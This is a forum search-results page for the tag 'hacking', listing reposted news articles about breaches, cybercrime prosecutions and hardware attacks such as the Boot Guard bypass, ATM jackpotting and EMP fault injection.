Jump to content

Search the Community

Showing results for tags 'hacking'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 73 results

  1. With just a year to go before the 2020 Census, the U.S. government is urgently working to safeguard against hacking and disinformation campaigns as it perfects a plan to count about 330 million people largely online for the first time. Going digital is intended to cut costs. But cybersecurity experts say it may also put the survey at unprecedented risk in a nation embroiled in fallout from Russian interference in the 2016 election. Any outside attempt to discredit or manipulate the decennial survey could drive down response rates, imperiling the integrity of data that help determine a decade's worth of federal funding, congressional apportionment and redistricting throughout the country. "Just as with voting, completing the census is a powerful exercise in our democracy, and there are always people who want to prevent others from exercising their power," said Indivar Dutta-Gupta, co-executive director of the Georgetown Center on Poverty and Inequality and an expert on the census. "I think there will be lots of attempts. We should be concerned." So far, there has been no indication of anyone trying to target the survey, but experts say the risks will probably grow as the launch draws closer. Census Bureau officials say they are working with experts in the government and private sector, including at the Department of Homeland Security, Facebook, Microsoft and Google, to defend against people or foreign states who try to undermine the U.S. government or prevent certain groups from being counted. They plan to encrypt incoming information, scan responses for unusual activity and monitor social media to spot attempts to mislead the public. The bureau has bought up more than 100 census-related domain names so they can't be used to create fake census sites, and it plans to aggressively push the message that completing the survey is safe and that being counted is beneficial to communities. Yet cybersecurity experts cite several reasons to be concerned with the plan. It comes at a time when trust in the government generally is low. Many people's trust in the census in particular has been eroded by fears about the Trump administration's decision last year to add a citizenship question to the survey. The question has been struck down by two federal courts and the Supreme Court is expected to decide this spring whether it will appear on the forms. At the same time, previous data breaches have left many Americans leery of sharing personal information online. The federal government’s troubled track record in building and maintaining technological systems includes the repeated meltdowns of healthcare.gov in 2013 and the Office of Personnel Management hack, revealed in 2015, that exposed names, Social Security numbers, salaries and other information on more than 21 million federal workers, allegedly to Chinese hackers. More recently, the Federal Emergency Management Agency exposed the personal addresses and banking information of 2.5 million disaster survivors. Joshua Geltzer, a former National Security Council official who has warned of security risks to the census and called for greater transparency on it, said it is particularly important to clarify how it will be protected given how Russian interference in the last presidential election spawned years of questions - many still unanswered - about how seriously outside forces were able to affect a major American vote. "We know that actors like the Russians and others are interested in finding ways to make our democracy seem weak, brittled, flawed," said Geltzer, who is executive director of Georgetown Law's Institute for Constitutional Advocacy and Protection. He added, "I don't think it's crazy to worry that there might still be problems when this thing rolls around. We haven't cracked the code on this in terms of other contexts, of the elections, of the general democracy, so I wouldn't expect the Census Bureau to have figured this out." Disrupting a census is not unprecedented: When Australia put its census online in 2016, cyberattackers launched what experts call a Distributed Denial of Service attack, in which hackers intentionally overload online systems. The onslaught crashed a critical website, slowing the count. In past U.S. censuses, survey forms arrived in people's mailboxes, and those who didn't mail them in received visits from enumerators carrying another set of paper forms. This time, most households will receive an initial mailing inviting them to log on to the bureau's website (paper forms will be mailed at that point to the 20 percent least likely to be online, including older people and those in areas with low Internet connectivity). Households that don't respond electronically will then receive paper forms by mail, and when enumerators knock on doors to follow up with those who still haven't responded, they will intake respondents' information electronically, via an iPhone 8. The decennial census does not gather Social Security numbers or financial information "Most people fill out credit card applications with much more personal information," said the bureau's assistant director of communications, Stephen Buckner. The bureau has systems in place to guard against hacks. After encrypting the data at two points in the process, it will store the data in its own secure Cloud environment through the Amazon Web Services' GovCloud. (Amazon Chief Executive Jeff Bezos owns The Washington Post.) It will continuously monitor incoming data, using an automated system that will look for suspicious activity, check information against existing records, and refer questionable surveys to analysts for follow-up. In the event of a website slowdown or crash, there will be a backup system as well as options to complete the survey via telephone or mail. Indications of hacks might include unusual patterns of activity, such as a single-family home reporting that it has 30 residents, or responses coming in too rapidly for a survey that should take about 10 minutes to fill out online. "If the Census Bureau sees a response is being generated every 15 seconds from a certain computer or a certain area," that would raise suspicions, said Maria Filippelli, public interest technology census fellow with New America, a nonpartisan Washington think tank. Any unusual spikes "would be investigated, isolated and shut down." But the system for collecting information has built-in vulnerabilities, some security experts say. For example, there is no way to stop a person from uploading information about a particular address even if he or she is not a resident there. (While the mailings will include an ID number, respondents can fill out the survey without using the number.) Census Bureau officials say such activity will be detected as incoming responses are automatically checked against existing records; if a discrepancy is spotted, it will be flagged for human review. "We constantly scan it to see if some new vulnerability occurred, and if it occurred, then we fix it," said Kevin Smith, the bureau's chief information officer. "We are absolutely performance-testing it above and beyond the level that we need to." The bureau has been working with DHS's Cybersecurity and Infrastructure Security Agency (CISA), where a team of about 20 people is focused on helping secure the system and gaming out possible hacks. "The two most important things that I've got going on in both prepping and executing next year are the election and the census," an official there said. "The risk to the census is fairly broad, and they're well aware of this, they're taking a lot of really good actions to secure against these. But then you could have anything from an individual hacker trying to get into some aspect of it to just be difficult, to nation-states trying to gain access in order to get access to personally identifiable information to potentially change census collection, and then you've got the foreign influence piece as well, sowing confusion and discord. The census is a key tenet of our democracy, and so some of the same risks and threats you saw to elections are applicable to census." A research company that surveys the Web for signs of malfeasance said it detected some chatter about the census a couple of years ago, but so far has seen no evidence of a concerted campaign. That is not surprising given the survey is a year off. A more coordinated effort might not come together until later in the process, said a researcher at the company, which asked for anonymity because of the private nature of its work. But even if census data aren't hacked, concerns over cybersecurity could create an atmosphere ripe for disinformation campaigns seeking to influence how, or whether, respondents fill out the survey. This could come in the form of fake reports of Immigration and Customs Enforcement officials accompanying census enumerators to people's homes, fake news stories about census data being hacked, or phishing websites that trick people into thinking they have filled out the real survey. Any of this could lower response rates, jeopardizing the quality of the data and driving up costs as the agency attempts to collect information for nonresponding households by going door to door and combing government and public records. The bureau must navigate a delicate balance between warning people about these dangers and scaring them off. "It's tough, for those who care about the census," Dutta-Gupta said. "We have to be careful in not raising false alarms or concerning people more than they need to be, since trust is essential in ensuring a fair and accurate count." The bureau has been meeting with companies such as Microsoft, Google, Facebook and Twitter to plan how to identify and stop misinformation as it comes online. In March, Facebook hosted an event with the bureau and other technology companies and civic organizations to talk about the census. "They're opening their doors, they realize the importance of this, they're being collaborative," Buckner said. Last year Facebook and Twitter adopted clear, specific prohibitions around voter suppression, hoping to stop the spread of posts, videos and other content designed to deceive users about how to vote. Representatives from these companies would not say whether they are planning something similar for the census. Facebook said only that census-related posts could be submitted to its third-party fact-checkers for review, while Twitter said it would take action against inauthentic accounts created with the intention to deceive users about the census. Google declined to discuss the census, and Microsoft said it is working with the bureau on cybersecurity but did not provide details. Educating the public about how the census works and what information to believe is a key part of protecting it, the CISA official said. "We need to ensure that the public understands where the information is coming from," the official said. "An informed public is our best defense." The U.S. Government Accountability Office has put the 2020 count on its high-risk list, and in a report last month it cited more than 1,000 system security weaknesses and warned that the bureau needs to address "before systems are deployed." At a full dress rehearsal for the count last year (which was scaled down from three locations to one because of funding shortages), "the Bureau did not test all 2020 Census systems and IT capabilities," the report said, adding that incomplete testing "increases the risk that innovations and IT systems will not function as intended," The bureau said it meets regularly with the GAO to address its recommendations, but added that not all the systems needed to be tested during the dress rehearsal, as some were up and running for other census surveys, and it was too early to test others. Nick Marinos, director of IT and cybersecurity issues at the GAO, said although the bureau's innovations make sense, it is coming up against a hard deadline to make sure its systems run smoothly. "This is an unprecedented effort. . . . Globally, there haven't been too many online censuses performed," he said. "I think the bureau itself is anxious and I think that is warranted. I think we are also holding our breath, waiting to see what the next six months brings." Source
  2. Equifax revealed its earnings release related to the security breach suffered in 2017, the incident has cost about $1.4 billion plus legal fees. Equifax revealed this week its earnings release related to the security breach suffered by the credit bureau back in 2017, the incident has cost about $1.4 billion plus legal fees. In 2017 Equifax confirmed it has suffered a massive data breach, cyber criminals stole sensitive personal records of 145 million belonging to US citizens and hundreds of thousands Canada and in the UK. Attackers exploited the CVE-2017-5638 Apache Struts vulnerability. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server. The vulnerability was fixed back in March 2017, but the company did not update its systems, the thesis was also reported by an Apache spokeswoman to the Reuters agency. Compromised records included names, social security numbers, birth dates, home addresses, credit-score dispute forms, and for some users also the credit card numbers and driver license numbers. In March 2018, experts argued the Equifax hack is worse than previously thought, according to documents provided by Equifax to the US Senate Banking Committee the attackers also stole taxpayer identification numbers, phone numbers, email addresses, and credit card expiry dates belonging to some Equifax customers. A few weeks later the results of the forensic investigation revealed additional 2.4 Million identities were involved in the security incident. Chief Executive Mark Begor confirmed that Equifax reached settlement agreements recently with some of the class action lawsuits and government investigators. “This is a positive step forward for Equifax, as we work to put the 2017 cybersecurity event behind us,” he explained. According to Begor, the settlement terms include the creation of a single “consumer redress fund” to respond and consolidate redress requests. “There are still many other lawsuits outstanding.” reported the website Wabe.org. “The company has said hundreds of suits were filed against it since the breach, including more than 2,500 individual consumer plaintiffs, international and domestic class action suits, shareholder litigation and government lawsuits from states and cities.” In June 2018, Equifax agreed to the Consent Order from some state banking regulators, many governmental agencies and officials are still investigating the breach. “The company said earlier this year that the Consumer Financial Protection Bureau and Federal Trade Commission had told Equifax the agencies do “intend to seek injunctive relief damages and, with respect to the CFPB, civil money penalties against us based on allegations related to the 2017 cybersecurity incident.”” continues the Wabe site. Expert believe that Equifax must be punished with exemplary penalties that have to incentivize the credit bureaus to protect consumer data. “Equifax still hasn’t paid a price two years after losing the financial DNA of 150 million Americans,” said Mike Lit, a national campaign director at the consumer advocate, U.S. Public Interest Research Group. “That’s why we need strong oversight and meaningful financial penalties to incentivize the credit bureaus to protect our data.” Source
  3. Cybercrime comes to school lunches School lunches exec faces felony charges related to the hacking of his rival’s network to expose weak security Every form of crime seems to invade the world of cybersecurity. Sooner or later that had to include the age-old childhood bullying trauma of school lunch theft. Except in this case the pilfered prize was data, not baloney. Keith Wesley Cosbey, CFO of California school lunch provider Choicelunch, was arrested in April on two felony counts — identity theft and unlawful computer access. The San Francisco Chronicle reports that law enforcement accuses Cosbey of hacking into the network of longtime Choicelunch rival The LunchMaster, accessing sensitive student data including names, grades, meal preferences, and allergy info. The charges contend that Cosbey, claiming to be an anonymous tipster, then sent the stolen data to the California Department of Education in an attempt to discredit The LunchMaster by exposing weak security and complaining the company does not do enough to protect student data. When the Department of Education confronted The LunchMaster about the breach, the company launched an internal investigation. The LunchMaster cybersecurity team was able to trace the breach back to an IP address in Danville, Calif., where Choicelunch is based. The LunchMaster contacted the FBI in April 2018, and after a yearlong investigation, Cosbey was arrested. Cosbey is currently out on $125,000 bond and is due in court later this month. If convicted, he faces over three years in prison. This week, investigators allowed LunchMaster to notify families affected by the breach, which the company has been doing, The Chronicle reported. Source
  4. By replacing a PC's SPI flash chip with one that contains rogue code, an attacker can can gain full, persistent access. Researchers have found a new way to defeat the boot verification process for some Intel-based systems, but the technique can also impact other platforms and can be used to compromise machines in a stealthy and persistent way. Researchers Peter Bosch and Trammell Hudson presented a time-of-check, time-of-use (TOCTOU) attack against the Boot Guard feature of Intel's reference Unified Extensible Firmware Interface (UEFI) implementation at the Hack in the Box conference in Amsterdam this week. Boot Guard is a technology that was added in Intel Core 4th generation microarchitecture -- also known as Haswell -- and is meant to provide assurance that the low-level firmware (UEFI) has not been maliciously modified. It does this by checking that the loaded firmware modules are digitally signed with trusted keys that belong to Intel or the PC manufacturer every time the computer starts. Bosch, an independent researcher and computer science student at Leiden University in the Netherlands, discovered an anomaly in the Boot Guard verification process while he was trying to find a way to use the open-source Coreboot firmware on his own laptop. In particular, he noticed that after the system verified the firmware and created a validated copy in cache, it later re-read modules from the original copy located in the Serial Peripheral Interface (SPI) memory chip -- the chip that stores the UEFI code. This isn't correct behavior, because the system should only rely on the verified copy after the cryptographic checks are passed. This made Bosch think there might be an opportunity for an attacker to modify the firmware code after it's been verified and before it's incorrectly re-read from SPI memory. He took his findings and an early proof-of-concept implementation to Trammell Hudson, a well-known hardware and firmware researcher whose previous work includes the Thunderstrike attacks against Apple's Thunderbolt technology. Hudson confirmed Bosch's findings and together worked on an attack that involves attaching a programming device to the flash memory chip to respond with malicious code when the CPU attempts to reread firmware modules from SPI memory instead of the validated copy. The result is that malicious and unsigned code is executed successfully, something that Boot Guard was designed to prevent. While the attack requires opening the laptop case to attach clip-on connectors to the chip, there are ways to make it permanent, such as replacing the SPI chip with a rogue one that emulates the UEFI and also serves malicious code. In fact, Hudson has already designed such an emulator chip that has the same dimensions as a real SPI flash chip and could easily pass as one upon visual inspection if some plastic coating is added to it. What are the implications of such TOCTOU attacks? The Intel Boot Guard and Secure Boot features were created to prevent attackers from injecting malware into the UEFI or other components loaded during the booting process such as the OS bootloader or the kernel. Such malware programs have existed for a long time and are called boot rootkits, or bootkits, and attackers have used them because they are very persistent and hard to remove. That's because they re-infect the operating system after every reboot before any antivirus program has a chance to start and detect them. In its chip-swapping variant, Hudson's and Bosch's attack acts like a persistent hardware-based bootkit. It can be used to steal disk encryption passwords and other sensitive information from the system and it's very hard to detect without opening the device and closely inspecting its motherboard. Even though such physical attacks require a targeted approach and will never be a widespread threat, they can pose a serious risk to businesses and users who have access to valuable information. Such a physical compromise could occur in different ways, for example in an Evil-Maid-type scenario where a high value target, like a company's CEO, travels to a foreign country and leaves their laptop unattended in their hotel room. Bosch tells CSO that replacing the SPI memory chip with a rogue one designed to execute this attack would take 15 to 20 minutes for an experienced attacker with the right equipment. Another possibility are supply chain attacks or the so-called "interdiction" techniques where computer shipments are intercepted in transit, for example by an intelligence agency, are backdoored and then resealed to hide any tampering. The documents leaked by Edward Snowden showed that the NSA uses such techniques, and it is likely not the only intelligence agency to do so. Some devices do have tamper-evident seals or mechanisms, but someone with the right resources and knowledge can easily bypass those defenses, Bosch tells CSO. Malicious employees could also use this technique on their work-issued laptops to either bypass access controls and gain administrator privileges or to maintain access to the company's data and network after they leave the company. Such a compromise would survive the computer being wiped and being put back into use. There have been several cases over the years of economic espionage where employees working for various companies were caught stealing trade secrets and passing them to foreign governments or to competitors. What is the mitigation? The two researchers notified Intel of their findings in January and tell CSO that the chipmaker treated the issue seriously and assigned a high severity to it. The company already has patches available for its reference UEFI implementation -- known as Tianocore -- that it shares with BIOS vendors and PC manufacturers. The researchers haven't yet tested the fixes, but at least based on the description they seem comprehensive and should prevent similar attacks in the future. The problem is that distributing UEFI patches has never been an easy process. Intel shares its UEFI kit with UEFI/BIOS vendors who have contracts with various PC manufacturers. Those OEMs then make their own firmware customizations before they ship it inside their products. This means that any subsequent fixes require collaboration and coordination from all involved parties, not to mention end users who need to actually care enough to install those UEFI updates. The patches for the critical Meltdown and Spectre vulnerabilities that affected Intel CPUs also required UEFI updates and it took months for some PC vendors to release them for their affected products. Many models never received the patches in the form of UEFI updates because their manufacturers no longer supported them. The two researchers plan to release their proof-of-concept code in the following months as part of a tool called SPISpy that they hope will help other researchers and interested parties to check if their own machines are vulnerable and to investigate similar issues on other platforms. "I would really like to see the industry move towards opening the source to their firmware, to make it more easy to verify its correctness and security," says Bosch. Source
  5. The accounts of Eamonn Holmes and Louis Theroux were among those hacked An online hacking security agency has “hijacked” multiple Twitter accounts in an effort to make a point regarding online security issues. On Thursday, the message: “This account has been temporarily hijacked by Insinia Security,” appeared on the Twitter accounts of a “number of celebrities” including Eamonn Holmes and Louis Theroux. The tweet also appeared on the Twitter feed of The Independent's travel correspondent Simon Calder. According to a post on Medium by Insinia Security, which explains the hijacking, it was done to highlight the security dangers of having a phone number associated with a Twitter account. Mike Godfrey, the CEO of Insinia Security, confirmed to The Independent the reason behind the hacking, explaining: “Insinia have warned for years that using text messaging for authentication, interaction or security is totally unacceptable and leaves people vulnerable to attack. “This issue was highlighted to Twitter in 2007, again in 2009, again in 2011 and almost every year since. Quite simply; Twitter doesn’t listen. The campaign today was to highlight these vulnerabilities, how serious they can be and how someone with a relatively low skill set and a range of tools can control social media that people use to control their brands, career, image and much more. People have a right to know the truth about the state of insecurity that huge companies like Twitter leave innocent users in.” And, according to Godfrey, hijacking the accounts was easy - “In this case, it was a simple task of ‘spoofing’ the Twitter users MSISDN (mobile phone number) and sending texts that appeared to be from their phone to Twitter, which will automatically accept commands provided it believes that the text has come from the users phone number, which it did,” he told us. While Godfrey would not disclose “how these numbers were obtained,” he did say the entire attack “took less than 10 minutes to carry out and complete.” On Medium, the depth of the hijacking was further explained - and the dangers this lack of security poses. “We used this method to successfully control the targets Twitter account, allowing us to send DM’s, retweet and like tweets, follow and unfollow people and much more,” the post reads. According to Insinia Security, this flaw in security could lead to potential risks such as the spread of offensive or extremist material and the spread of fake news. To protect oneself, Godfrey told us the best way is to use a “separate number for TFA (two-factor authentication) on Twitter.” “People must understand that even someone having your phone number puts you at risk,” he continued. “We shouldn’t be so relaxed with who we give our numbers to and Twitter certainly shouldn’t be allowing people to tweet and control accounts by sending texts with no authentication.” source
  6. When a government body creates a self-service payment system for paying for everything from utility bills to permits and fines, you would expect convenience to be tied to adequate security for financial data. Not necessarily so in the case of Click2Gov, a payment portal system used by many US cities, both small and large. Developed by Central Square, formerly known as Superion, it was rumored last year that the local government portal service may have been subject to a data breach. In September this year, cybersecurity firm FireEye confirmed that a security incident had taken place, in which threat actors had planted never-before-seen malware to scrape payment card details from US citizens. It was suggested that the new malware strains, Firealarm and Spotlight, were able to parse logs for payment card data and extract payment details. Security research firm Gemini Advisory has now released a report examining the after-effects of the attack, in which it is believed 294,929 payment records have been compromised across at least 46 cities in the US, as well as one in Canada. The findings suggest that less than 50 percent of cities which have lost customer data either know or have publicly disclosed data breaches occurring at their sites. On Tuesday, the company said that by selling this information in the Dark Web, the threat actors have earned themselves at least $1.7 million. In the meantime, Central Square is still trying to work out how the attacks took place -- and potentially portals are still at risk. The company did deploy a patch in June to resolve the original vulnerabilities the hackers used to infiltrate Click2Gov, but told Gemini Advisory that "the system remains vulnerable for an unknown reason." However, the firm added that the affected systems were all locally hosted, while the cloud-based Click2Gov software was not affected. It seems, then, that local systems have security issues which are yet to be addressed. Saint Petersburg, Florida, Bakersfield, California, and Ames, Iowa, have all reported utility payment portal data breaches in the last three months. Payment data from these portals have been found for sale in the web's underbelly. "In our analysis of all 20 reported instances of the Click2Gov breaches, we have definitively confirmed that, in total, at least 111,860 payment cards were compromised," Gemini Advisory says. "Also, in each instance, the stolen payment cards were uploaded for sale either during the breach or immediately after the breach was identified and reported, with the average price of $10 per card. " Two hackers have been tracked through their wares, of which the cybersecurity firm believes both are likely part of the criminal ring which conducted the widespread attacks. Gemini advisory's Director of Research, Stas Alforov, told Fortune that Click2Gov is working with local authorities to resolve the security issues which still exist, and the data theft is due in part to "a lack of sophistication on the part of municipal IT workers." source
  7. An Australian teenager has pled guilty to hacking Apple’s system multiple times in a span of several months, but will not be going to jail. He said he did it because he’s just a huge Apple fanboy. Melbourne news outlet the Age reported that Apple had alerted the FBI after the company detected a breach. Then authorities notified the Australian Federal Police, which raided the teen’s home. There agents found 90Gb of sensitive files in a folder titled “hacky hack hack.” A magistrate told the court that the teen (not named for legal reasons) exploited a VPN intended for remote connection, according to Bloomberg. Apple reportedly blocked his access in November 2016, but he regained access last year. Apple did not immediately respond to a Gizmodo request for comment, but in a statement to Bloomberg Apple said that customers’ personal data was not compromised. The teen’s lawyer said at the boy’s appearance at Children’s Court in August that he hacked Apple “because he was such a fan” of the company, according to the Age. Bloomberg reports the teen told police that he breached Apple’s systems, in part, because he enjoyed “just being in the corporation pretending you were employees,” and the activity was apparently addictive. According to Bloomberg, the magistrate told the court that the teenager had shown remorse and had cooperated with law enforcement, and would only be given an eight-month probation instead of jail time. “Your offending is serious,” the magistrate said to the teen, according to Bloomberg. “It was sustained, sophisticated, and a successful attack on the security of a major multinational corporation.” The teen was 16 when he first accessed Apple’s system. According to the Age, he is now 19 and has been accepted at a university where he plans on studying criminology and cyber security. Source
  8. A Romanian Woman Eveline Cismaru. 28, pled guilty to federal charges for illegally gaining access to more than 126 computers that connected to Surveillance cameras installed and used by Metropolitan Police Department (MPD) and infected them with ransomware. She pled guilty before the Honorable Dabney L. Friedrich to one count of conspiracy to commit wire fraud and one count of conspiracy to commit computer fraud, carry statutory maximums of 20 years and five years in prison, Cismaru agrees to cooperate fully in the investigation and she is to be sentenced on Dec. 3, 2018. Investigators arrested Cismaru, 28, and a co-defendant, Mihai Alexandru Isvanca, 25 in Romania, Cismaru extradited to the united states on July 26, 2018, and Isvanca pending extradition to the United States. “According to the government’s evidence, beginning in early January 2017, and continuing through Jan. 12, 2017, a computer hacking attack on the MPD computer network disabled two-thirds of the outdoor surveillance cameras operated by MPD in the District of Columbia, just days before the 2017 Presidential Inauguration.” reads Department of Justice press release. Investigators also spotted that the conspirators were in the process of attacking as many as 179,616 other computers using stolen e-mails, e-mail passwords, and banking credentials. The ransomware attack held on 2017 just before the day of Presidential Inauguration and due to the rapid response by investigators and MPD’s Chief Technology Office, the overall security of the 2017 Inauguration was not impacted by this event. Source
  9. The internet and technology have become a way of life for us all. From cars to homes, we depend on technology. While it serves as a relief to us, there are always drawbacks to it. In case of the internet, the risks involves hacking. In the past few months, we have seen cryptocurrency hacks, data hacks, bank hacks, phone hacks, social media hacks and whatnot. Keeping that in mind, researchers have invented a black box chip that makes it difficult for hackers to hack into a system. There was a need to come up with a working solution to prevent hacking, and this black box seems to be the answer to it. What Is The Black Box Chip? It’s a memory chip that makes the entire system complex so that hackers can’t clone the system. A circuit that is made up of black box chips (memory resistors), makes it hard to predict the voltage outputs of a system. This makes it nearly impossible to clone a system, create nodes in a network to attack it. Hence, this chip can help prevent hacking. Who Invented It? An electrical and computer engineering professor at University Of California, Dmitri Strukov, is working on this technology and it will soon be available commercially to prevent hacking. The Bottomline While the technology is still in its testing stage, there finally looks hope to prevent hacking in the future. < Here >
  10. Is it allowed under the site terms and conditions to talk about learning and preventing hacking?
  11. ATM makers warn of 'jackpotting' hacks on U.S. machines (Reuters) - Diebold Nixdorf Inc and NCR Corp, two of the world’s largest ATM makers, have warned that cyber criminals are targeting U.S. cash machines with tools that force them to spit out cash in hacking schemes known as “jackpotting.” The two ATM makers did not identify any victims or say how much money had been lost. Jackpotting has been rising worldwide in recent years, though it is unclear how much cash has been stolen because victims and police often do not disclose details. The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico. The companies confirmed to Reuters on Saturday they had sent out the alerts to clients. NCR said in a Friday alert that the cases were the first confirmed “jackpotting” losses in the United States. It said its equipment had not been targeted in the recent attacks, but that it was still a concern for the entire ATM industry. “This should be treated by all ATM deployers as a call to action to take appropriate steps to protect their ATMs against these forms of attack,” the alert said. Diebold Nixdorf said in a separate Friday alert that U.S. authorities had warned the company that hackers were targeting one of its ATM models, known as Opteva, which went out of production several years ago. A confidential U.S. Secret Service alert sent to banks said the hackers targeted stand-alone ATMs typically located in pharmacies, big box retailers and drive-thru ATMs, Krebs on Security reported. Diebold Nixdorf’s alert described steps that criminals had used to compromise ATMs. They include gaining physical access, replacing the hard drive and using an industrial endoscope to depress an internal button required to reset the device. Reuters was unable to obtain a copy of the Secret Service report and an agency representative declined comment. Officials with the Federal Bureau of Investigation could not immediately be reached. Russian cyber security firm Group IB has reported that cyber criminals remotely attacked cash machines in more than a dozen countries across Europe in 2016. Similar attacks were also reported that year in Thailand and Taiwan. Source
  12. JenX Botnet Has Grand Theft Auto Hook Researchers at Radware have discovered a new botnet that uses vulnerabilities linked with the Satori botnet and is leveraging the Grand Theft Auto videogame community to infect IoT devices. Satori is a derivative of Mirai, the notorious botnet that in 2016 infamously managed to take down Dyn, a DNS hosting provider that supports some of the world’s largest websites. The vulnerabilities in question are CVE-2014-8361 and CVE-2017-17215, which affect certain Huawei and Realtek routers, Radware researcher Pascal Geenens said in a blog post. Radware’s inquiry into the botnet led it to a command-and-control server hosted at the site San Calvicie, which offers not only multiplayer mod support for Grand Theft Auto: San Andreas, but also DDoS attacks for a fee. Enthusiasts of the venerable videogame series, which places players in an immersive 3-D world of violence and vicarious thrills, have created an extensive universe of add-on features and tweaks, or “mods,” in the name of enriching and extending their experience. Sites such as San Calvicie cater to GTA gamers who want to host their own custom versions of GTA for multiplayer action. “The Corriente Divina (‘divine stream’) option is described as ‘God’s wrath will be employed against the IP that you provide us,” Geenens wrote of the site’s DDoS offering. “It provides a DDoS service with a guaranteed bandwidth of 90-100 Gbps and attack vectors including Valve Source Engine Query and 32 bytes floods, TS3 scripts and a ‘Down OVH’ option which most probably refers to attacks targeting the hosting service of OVH, a cloud hosting provider that also was a victim of the original Mirai attacks back in September 2016. OVH is well known for hosting multi-player gaming servers such as Minecraft, which was the target of the Mirai attacks at the time.” Shortly after Geenens made his initial discovery, he returned to the site and found that the terms of engagement had changed. Now the listing included a reference to “bots,” and offered a DDoS volume of between 290 and 300 Gbps, for the same low price of $20 a pop. While derived from established code, the San Calvicie-hosted botnet, which Geenens has dubbed “JenX”, is deployed in a different manner than its predecessors. “Untypical for IoT botnets we have witnessed in the past year, this botnet uses servers to perform the scanning and the exploits,” he wrote. “Nearly all botnets, including Mirai, Hajime, Persirai, Reaper, Satori and Masuta perform distributed scanning and exploiting. That is, each victim that is infected with the malware will perform its own search for new victims. This distributed scanning provides for an exponential growth of the botnet, but comes at the price of flexibility and sophistication of the malware itself.” The centralized approach employed by JenX trades slower growth for lower detection, he added. The danger from JenX should be mostly confined to GTA San Andreas users, Gessens said, but with a stern caveat. “[T]here is nothing that stops one from using the cheap $20 per target service to perform 290 Gbps attacks on business targets and even government related targets,” he wrote. “I cannot believe the San Calvicie group would oppose to it.” Radware filed abuse notifications related to JenX, resulting in a partial takedown of the botnet’s server footprint, but it remains active. JenX’s implementation makes taking it down a tricky task. “As they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones,” he wrote. “These providers do not care about abuse. Some are even providing hosting services from the Darknet. If the exploit servers would be move to the Darknet, it would make it much more difficult to track down the servers’ location and take them down.” SOURCE
  13. When you think of a standard hacker toolkit, software vulnerabilities and malware come to mind. But a pair of researchers are testing a different type of instrument: a physical tool that can break into devices with a wave of your hand. At the recent REcon computer security conference, Red Balloon Security founder Ang Cui and research scientist Rick Housley presented a new approach to hacking a processor that uses electromagnetic pulses to produce specific glitches in hardware. By disrupting normal activity at precise intervals, the technique can defeat the Secure Boot protection that keeps processors from running untrusted code. Researchers have experimented with “fault injection attacks”—hacks that cause a strategic glitch, which in turn triggers abnormal, exploitable computer behavior—for decades. Those attacks, though, typically require physical access to a target's components. “The advantage of this technique is that it’s physically noninvasive. You don’t have to touch the device, and you don’t leave any physical marks behind,” Cui says. “There’s no exchange of data at the electromagnetic pulse stage, so this would never be caught by a firewall.” Insecure Boot Red Balloon specializes in internet-of-things-intrusion defense; think of it as antivirus software for IoT. But the company has run into problems putting its security tool on IoT devices guarded by Secure Boot. Red Balloon's products don't undermine this safeguard; the company works with vendors to make its software compatible. But the dilemma got Cui and Housley interested in the theoretical question of whether a fault-injection attack could circumvent Secure Boot on locked-down IoT devices. They started experimenting with the Cisco 8861 VoIP phone model that they had tried and failed to equip with their security product. (Cui also has a history of hacking Cisco phones.) The two found that if they poked the phone’s flash memory with a charged wire at the right moment while it booted up, they could cause a glitch that stopped the boot process. Instead, the phone surfaced access to a command-line interface that Cisco normally uses for debugging. Consumers are never supposed to see it. Cui and Housley also found vulnerabilities in the TrustZone security scheme of the phone's processor that allowed them to write code on processor memory that was supposed to be protected. (They disclosed these bugs to Cisco in April 2016.) Once they had access to the troubleshooting portal during boot, the researchers could load and execute their own code in a secure part of the processor to override Secure Boot. Invisible Touch All of which makes for a complicated hack, and one that requires cracking a phone open when you have a charged wire handy. But Cui and Housley wanted to take the attack a step farther, and realized that a well-timed EMP blast could trigger the same fault. They could execute the whole hack without needing to tamper with the components of the phone. Lab-grade EM pulsing equipment costs hundreds of thousands of dollars, so instead the researchers built their own system for about $350 using a 3-D printer and readily available components. They plan to release open source schematics of the setup so other researchers can use it too. Eventually, Cui and Housley worked out that delivering a 300 volt pulse to the phone's RAM 4.62 seconds into startup reliably created the glitch they wanted. With access to the debugging portal, they could use the phone’s console port—an auxiliary port on the back of the phone—to load in and run their Secure Boot override protocol within five seconds. "The attack’s principle is clever," says Jean-Max Dutertre, a hardware security researcher at École Nationale Supérieure des Mines de Saint-Étienne in France. "Finding a way to bypass timing and spatial resolution issues is always highly effective." The system can currently deliver the pulse from 3 millimeters away from the phone, so while the hack doesn't require physical contact, it does need proximity. Still, an attacker could cause the crucial fault by, say, waving their hand over the device while holding a tiny electromagnetic pulse generator—a subtler action than opening up the phone and sticking a wire into it. “With any hardware attack you need to be physically present, so that’s already a huge barrier,” says Jasper van Woudenberg, the chief technology officer of Riscure North America, a firm that tests hardware and software security. “But this is a nice proof of concept to show that if you don’t take care of these attacks, they could actually happen.” Who's Down With EMP What makes the attack so challenging is, in part, the Broadcom multicore 1Ghz ARM processor it targets. Modern processors pack transistors in densely and have high clock speeds, making it difficult to discharge EM pulses quickly and accurately enough to impact one specific process on a chip without collateral damage. But by thinking of the interconnected components in a device (like the processor, flash memory, and RAM) as a network of computers in and of themselves, researchers can create fault injection strategies that are more like network hacking—attacking a system's weakest point to compromise the real target, in this case the powerful processor. “We wanted to look at the second-order effects of an electromagnetic pulse, as it affects not just a single machine but a complex network of interdependent components,” Cui says. “So that allows us to sidestep the traditional electromagnetic fault injection limitations, and use electromagnetic pulses to predictably change the way computers compute.” As electromagnetic fault injection hacking becomes more robust, it will in turn become more important to protect components from physical, noninvasive hacks. Some ultrasecure devices already include such defenses, because further refinement would put not only 